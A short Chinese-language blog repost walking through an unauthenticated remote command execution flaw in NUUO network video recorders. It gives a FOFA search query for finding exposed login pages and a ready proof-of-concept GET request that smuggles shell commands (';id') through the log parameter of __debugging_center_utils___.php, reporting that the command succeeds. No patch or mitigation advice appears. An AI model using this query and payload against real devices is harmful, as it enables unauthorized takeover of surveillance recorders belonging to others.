简介
NUUO Network Video Recorder(NVR)是中国台湾NUUO公司的一款网络视频记录器。
NUUO NVR视频存储管理设备的__debugging_center_utils___.php文件存在未授权远程命令执行漏洞,攻击者可在没有任何权限的情况下通过log参数执行任意命令。
漏洞复现
FOFA语法:
title="Network Video Recorder Login"
访问页面如下,不同版本会有区别
POC: /__debugging_center_utils___.php?log=;id
GET请求:http://ip:port/__debugging_center_utils___.php?log=;id
返回内容如下:
成功执行linux id命令文章来源:https://www.toymoban.com/news/detail-745476.html
poc: /__debugging_center_utils___.php?log=;id;help文章来源地址https://www.toymoban.com/news/detail-745476.html
到了这里,关于NUUO网络摄像头(NVR)RCE漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!